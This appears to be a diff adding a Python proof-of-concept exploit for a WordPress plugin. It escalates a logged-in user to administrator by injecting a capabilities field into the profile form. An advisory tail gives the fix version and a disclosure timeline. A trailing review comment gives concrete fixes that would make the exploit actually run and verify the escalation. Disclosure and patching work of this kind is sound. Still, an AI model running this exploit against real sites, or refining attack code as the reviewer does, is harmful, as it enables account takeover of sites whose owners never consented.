+(http://www.crummy.com/software/BeautifulSoup/)
+################################################################################
+
+import requests
+from bs4 import BeautifulSoup
+
+baseUrl = 'http://example.com'
+loginUrl = baseUrl + '/wp-login.php'
+profileUrl = baseUrl + '/wp-admin/profile.php'
+
+loginPostData = {
+    'log': 'username',
+    'pwd': 'password',
+    'rememberme': 'forever',
+    'wp-submit': 'Log+In'
+}
+
+s = requests.Session()
+
+r = s.post(loginUrl, loginPostData)
+
+if r.status_code != 200:
+    print('Login error')
+    exit(1)
+
+r = s.get(profileUrl)
+soup = BeautifulSoup(r.text, 'html.parser')
+
+f = soup.find('form', {'id': 'your-profile'})
+if not f:
+    print('Error')
+    exit(1)
+
+data = {
+    'eudwp_capabilities[administrator]': 1,
+}
+
+for i in f.find_all('input'):
+    if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
+        data[i.attrs['name']] = i.attrs['value']
+
+r = s.post(profileUrl, data)
+
+if r.status_code == 200:
+    print('Success')
+
+exit(0)
+
+"""
+
+Solution
+--------
+
+Upgrade to v0.4.2.1
+
+Timeline
+--------
+
+1. **2016-02-13**: Vendor notified through wordpress.org support forums
+2. **2016-02-13**: Vendor notified through through the contact form in
+his website
+3. **2016-02-13**: Vendor responded and received details about this issue
+4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue
+
+"""
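Review bot: The mail wrapping left `(http://www.crummy.com/software/BeautifulSoup/)` on a line of its own outside the `# Dependencies:` comment, and a bare `:` inside parentheses is a SyntaxError, so the script as committed cannot start; fold it back into the comment as `# Dependencies: BeautifulSoup (http://www.crummy.com/software/BeautifulSoup/)`. Both outcome checks are status-code only and prove nothing: wp-login.php re-renders its form with 200 on bad credentials (and a successful login is a redirect that requests follows to 200 as well), and the profile POST redirects back to profile.php with 200 whether or not `wp_capabilities` was written, so `print('Success')` fires on every run. Check for the session cookie after login, `if not any(c.name.startswith('wordpress_logged_in') for c in s.cookies): print('Login error'); exit(1)`, and confirm the escalation by re-fetching an admin-only page (or the profile) before printing Success. The `wp` table prefix is also baked into the `eudwp_capabilities[administrator]` key even though the description calls it an assumption; a `prefix = 'wp'` variable used as `'eud' + prefix + '_capabilities[administrator]'` would make that explicit and adjustable. `# !/usr/bin/python3` is not a shebang (space after `#`, and it is not on line 1), so it should either move to the first line as `#!/usr/bin/python3` or be dropped.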